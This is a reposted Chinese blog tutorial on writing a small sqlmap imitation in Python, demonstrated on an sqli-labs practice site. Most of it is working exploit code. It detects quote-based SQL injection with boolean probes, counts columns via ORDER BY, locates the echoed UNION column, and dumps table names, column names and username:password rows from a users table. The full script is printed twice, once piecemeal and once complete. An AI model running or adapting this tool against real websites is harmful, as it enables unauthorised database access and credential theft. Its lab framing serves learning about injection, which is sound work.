网络安全初入茅庐 --- 简易 sqlmap 制作(转载)

前景提要
学习网络安全有一段时间了,用惯了其他人编写的工具,决心自己写一个入门级别比较简单的小工具自己使用练习。

运行演示
进入一个 sqli-lab 的靶场当作测试网站。
在这里插入图片描述
获取其 url 地址:https://96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/index.php?id=1
运行程序
在这里插入图片描述
代码解析
首先检测网站是否存在 sql 注入,通过闭合单双引号以及布尔判断检测
def can_inject(text_url):
    """Probe *text_url* for SQL injection by closing a quote and comparing
    a boolean-TRUE page (and 1=1) against a boolean-FALSE page (and 1=2).

    Returns (True, quote) where quote is the URL-encoded quote ("%27" or
    "%22") that works, or (False, None) when neither quote is injectable.
    """
    text_list = ["%27", "%22"]  # URL-encoded single and double quote
    for item in text_list:
        # NOTE: '--+' is the MySQL inline comment; the scraped original
        # had it mangled to an en-dash ('–+'), which breaks the payload.
        target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"
        target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"
        result1 = send_request(target_url1)
        result2 = send_request(target_url2)
        soup1 = BeautifulSoup(result1, 'html.parser')
        fonts1 = soup1.find_all('font')
        content1 = str(fonts1[2].text)  # assumes sqli-lab pages carry text in the 3rd <font> — TODO confirm
        soup2 = BeautifulSoup(result2, 'html.parser')
        fonts2 = soup2.find_all('font')
        content2 = str(fonts2[2].text)
        # Injectable when the TRUE page renders normally ('Login' present)
        # and the FALSE page renders empty.  The original mixed `and`/`or`
        # without parentheses and compared with `is ''`; both fixed here.
        if content1.find('Login') != -1 and (content2 is None or content2.strip() == ''):
            log('使用' + item + "发现数据库漏洞")
            return True, item
        else:
            log('使用' + item + "未发现数据库漏洞")
    # Only give up after BOTH quote styles failed (original returned
    # False inside the loop, never trying the double quote).
    return False, None
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
如果检测出存在 sql 注入漏洞的话,通过 order by 检测字段列数
def text_order_by(url, symbol):
    """Determine the column count of the injectable query via ORDER BY.

    Probes ORDER BY 1..99 and returns the first index whose page breaks
    ('Login' disappears); returns 0 if no break is seen within 99 columns.
    """
    flag = 0
    for i in range(1, 100):
        log('正在查找字段' + str(i))
        # '--+' comment terminator restored (scrape mangled it to '–+')
        text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        if content.find('Login') == -1:
            log('获取字段成功 -> ' + str(i) + "个字段")
            flag = i
            break
    return flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
拿到每个字段后根据 union_select 联合查询检测可视化位置和字段位置
def text_union_select(url, symbol, flag):
    """Find which UNION SELECT column is echoed back on the page.

    Issues `union select 1,2,...,flag-1` with an impossible id (=0) so the
    union row is displayed, then returns (i, temp_list) where i is the
    echoed column number and temp_list is the surrounding page text used
    later as split markers.  Returns None implicitly if nothing echoes.
    """
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == flag - 1:
            text_url += str(i) + "%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    for i in range(1, flag):
        if content.find(str(i)) != -1:
            temp_list = content.split(str(i))
            return i, temp_list
1
2
3
4
5
6
7
8
9
10
11
12
13
14
通过访问网页找到网页内容获取数据库名
def get_database(url, symbol):
    """Fingerprint the DBMS by forcing a syntax error and scanning the
    error page; returns 'MySQL', 'Oracle', or None when unrecognized."""
    text_url = url + symbol + "aaaaaaaaa"  # deliberately malformed input
    result = send_request(text_url)
    if result.find('MySQL') != -1:
        return "MySQL"
    elif result.find('Oracle') != -1:
        return "Oracle"
    return None  # explicit: unknown back end
1
2
3
4
5
获取数据表名
def get_tables(url, symbol, flag, index, temp_list):
    """Dump the current database's table names with group_concat().

    The echoed column *index* carries the result; *temp_list* holds the
    page text around it, used to slice the value back out.
    """
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(table_name)" + ","
        elif i == flag - 1:
            text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]
1
2
3
4
5
6
7
8
9
10
11
12
获取字段名
def get_columns(url, symbol, flag, index, temp_list):
    """Dump the column names of the 'users' table with group_concat().

    BUG FIXED: the original put the second half of the FROM/WHERE string
    on its own line without parentheses, so it was a no-op expression and
    the injected SQL was silently truncated.
    """
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(column_name)" + ","
        elif i == flag - 1:
            # Parenthesized so both literals concatenate into one payload.
            text_url += (str(i) + "%20from%20information_schema.columns%20where%20"
                         "table_name='users'%20and%20table_schema=database()%20--+")
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
获取字段内容
def get_data(url, symbol, flag, index, temp_list):
    """Dump id:username:password rows from the users table.

    0x3a is the ASCII colon, used as the field separator inside
    group_concat so rows can later be split with ':'.
    """
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","
        elif i == flag - 1:
            text_url += str(i) + '%20from%20users%20--+'
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]
1
2
3
4
5
6
7
8
9
10
11
12
得到每个字段后,循环遍历出字段中的内容在输出位置显示
# Split the dumped rows and print them in aligned columns: the header row
# comes from the discovered column names, then one line per users record.
datas = get_data(url, symbol, flag, index, temp_list).split(',')
temp = columns.split(',')
print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
for data in datas:
    temp = data.split(':')  # rows were joined with 0x3a (':') in get_data
    print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
1
2
3
4
5
6
完整代码

imitate_sqlmap.py

import time,requests
from bs4 import BeautifulSoup

def log(content):
    """Print *content* prefixed with the current [HH:MM:SS] timestamp."""
    this_time = time.strftime('%H:%M:%S', time.localtime(time.time()))
    print("[" + str(this_time) + "]" + content)

def send_request(url):
    """GET *url* and return the response body as text."""
    res = requests.get(url)
    # requests' .text is already a str; the original's str() wrapper was redundant
    return res.text

def can_inject(text_url):
    """Probe *text_url* for SQL injection by closing a quote and comparing
    a boolean-TRUE page (and 1=1) against a boolean-FALSE page (and 1=2).

    Returns (True, quote) where quote is the URL-encoded quote ("%27" or
    "%22") that works, or (False, None) when neither quote is injectable.
    """
    text_list = ["%27", "%22"]  # URL-encoded single and double quote
    for item in text_list:
        # NOTE: '--+' is the MySQL inline comment; the scraped original
        # had it mangled to an en-dash ('–+'), which breaks the payload.
        target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"
        target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"
        result1 = send_request(target_url1)
        result2 = send_request(target_url2)
        soup1 = BeautifulSoup(result1, 'html.parser')
        fonts1 = soup1.find_all('font')
        content1 = str(fonts1[2].text)  # assumes sqli-lab pages carry text in the 3rd <font> — TODO confirm
        soup2 = BeautifulSoup(result2, 'html.parser')
        fonts2 = soup2.find_all('font')
        content2 = str(fonts2[2].text)
        # Injectable when the TRUE page renders normally ('Login' present)
        # and the FALSE page renders empty.  The original mixed `and`/`or`
        # without parentheses and compared with `is ''`; both fixed here.
        if content1.find('Login') != -1 and (content2 is None or content2.strip() == ''):
            log('使用' + item + "发现数据库漏洞")
            return True, item
        else:
            log('使用' + item + "未发现数据库漏洞")
    # Only give up after BOTH quote styles failed (original returned
    # False inside the loop, never trying the double quote).
    return False, None

def text_order_by(url, symbol):
    """Determine the column count of the injectable query via ORDER BY.

    Probes ORDER BY 1..99 and returns the first index whose page breaks
    ('Login' disappears); returns 0 if no break is seen within 99 columns.
    """
    flag = 0
    for i in range(1, 100):
        log('正在查找字段' + str(i))
        # '--+' comment terminator restored (scrape mangled it to '–+')
        text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        if content.find('Login') == -1:
            log('获取字段成功 -> ' + str(i) + "个字段")
            flag = i
            break
    return flag

def get_prefix_url(url):
    """Return *url* with the value after its LAST '=' removed,
    e.g. '...?id=1' -> '...?id'.

    BUG FIXED: the original split on every '=' and re-joined the pieces
    WITHOUT the separator, corrupting any URL containing more than one
    '=' (e.g. '?a=1&id=2' became '?a1&id').  rsplit keeps earlier '='s.
    """
    return url.rsplit('=', 1)[0]

def text_union_select(url, symbol, flag):
    """Find which UNION SELECT column is echoed back on the page.

    Issues `union select 1,2,...,flag-1` with an impossible id (=0) so the
    union row is displayed, then returns (i, temp_list) where i is the
    echoed column number and temp_list is the surrounding page text used
    later as split markers.  Returns None implicitly if nothing echoes.
    """
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == flag - 1:
            text_url += str(i) + "%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    for i in range(1, flag):
        if content.find(str(i)) != -1:
            temp_list = content.split(str(i))
            return i, temp_list

def exec_function(url, symbol, flag, index, temp_list, function):
    """Evaluate a SQL expression (e.g. 'version()', 'database()') in the
    echoed UNION column and return its output text.

    NOTE(review): if index == flag-1 the '--+' terminator is never
    appended (the index branch wins) — same as the original; confirm the
    echoed column is never the last one on the target.
    """
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += function + ","
        elif i == flag - 1:
            text_url += str(i) + "%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]

def get_database(url, symbol):
    """Fingerprint the DBMS by forcing a syntax error and scanning the
    error page; returns 'MySQL', 'Oracle', or None when unrecognized."""
    text_url = url + symbol + "aaaaaaaaa"  # deliberately malformed input
    result = send_request(text_url)
    if result.find('MySQL') != -1:
        return "MySQL"
    elif result.find('Oracle') != -1:
        return "Oracle"
    return None  # explicit: unknown back end

def get_tables(url, symbol, flag, index, temp_list):
    """Dump the current database's table names with group_concat().

    The echoed column *index* carries the result; *temp_list* holds the
    page text around it, used to slice the value back out.
    """
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(table_name)" + ","
        elif i == flag - 1:
            text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]

def get_columns(url, symbol, flag, index, temp_list):
    """Dump the column names of the 'users' table with group_concat().

    BUG FIXED: the original put the second half of the FROM/WHERE string
    on its own line without parentheses, so it was a no-op expression and
    the injected SQL was silently truncated.
    """
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(column_name)" + ","
        elif i == flag - 1:
            # Parenthesized so both literals concatenate into one payload.
            text_url += (str(i) + "%20from%20information_schema.columns%20where%20"
                         "table_name='users'%20and%20table_schema=database()%20--+")
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]

def get_data(url, symbol, flag, index, temp_list):
    """Dump id:username:password rows from the users table.

    0x3a is the ASCII colon, used as the field separator inside
    group_concat so rows can later be split with ':'.
    """
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","
        elif i == flag - 1:
            text_url += str(i) + '%20from%20users%20--+'
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]

def sqlmap(url):
    """Run the full workflow against *url*: detect injection, count the
    columns, locate the echoed column, then print the DBMS version,
    database name, table names, column names, and the users table rows.

    Returns False when no injection point is found; otherwise prints the
    dump and returns None.
    """
    log('欢迎来到SQL注入工具')
    log('正在进行SQL注入')
    result, symbol = can_inject(url)
    if not result:
        log('此网站不存在SQL漏洞,退出SQL注入')
        return False
    log('此网站存在SQL注入漏洞,请等待')
    flag = text_order_by(url, symbol)
    index, temp_list = text_union_select(url, symbol, flag)
    database = get_database(url, symbol)
    version = exec_function(url, symbol, flag, index, temp_list, 'version()')
    this_database = exec_function(url, symbol, flag, index, temp_list, 'database()')
    log('当前数据库 -> ' + database.strip() + version.strip())
    log('数据库名 -> ' + this_database.strip())
    tables = get_tables(url, symbol, flag, index, temp_list)
    log('数据表名 -> ' + tables.strip())
    columns = get_columns(url, symbol, flag, index, temp_list)
    log('数据列 -> ' + columns.strip())
    log('试图得到全部列…')
    # Header row from the column names, then one aligned line per record;
    # records were joined with 0x3a (':') inside get_data.
    datas = get_data(url, symbol, flag, index, temp_list).split(',')
    temp = columns.split(',')
    print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
    for data in datas:
        temp = data.split(':')
        print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
PyPi打包为可执行文件
在 cfg 文件中添加 entry_points 参数即可。
entry_points 参数定义了 imitate_sqlmap 通过 setuptools 注册的、外部可以直接调用的接口。
在imitate_sqlmap的setup.py里注册entry_points如下:

# setup.py snippet registering an entry point; the scraped original was
# missing the closing '},' of the entry_points dict and used curly quotes.
setup(
    name='imitate_sqlmap',
    entry_points={
        'imitate_sqlmap.api.sqlmap': [
            'databases=imitate_sqlmap.api.sqlmap.databases:main',
        ],
    },
)
1
2
3
4
5
6
7
该 setup() 函数注册了一个 entry_point ,属于 imitate_sqlmap.api.sqlmap.group 。注意,如果多个其它不同的 imitate_sqlmap 利用 imitate_sqlmap.api.sqlmap 来注册 entry_point ,那么我用 imitate_sqlmap.api.sqlmap 来访问 entry_point 时,将会获取所有已注册过的 entry_point。

原文链接:https://blog.csdn.net/qq_45414559/article/details/107896039?utm_medium=distribute.pc_feed.none-task-blog-vip_agree_hot-1.nonecase&depth_1-utm_source=distribute.pc_feed.none-task-blog-vip_agree_hot-1.nonecase&request_id=5f3066708c9fb674c67239e9

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值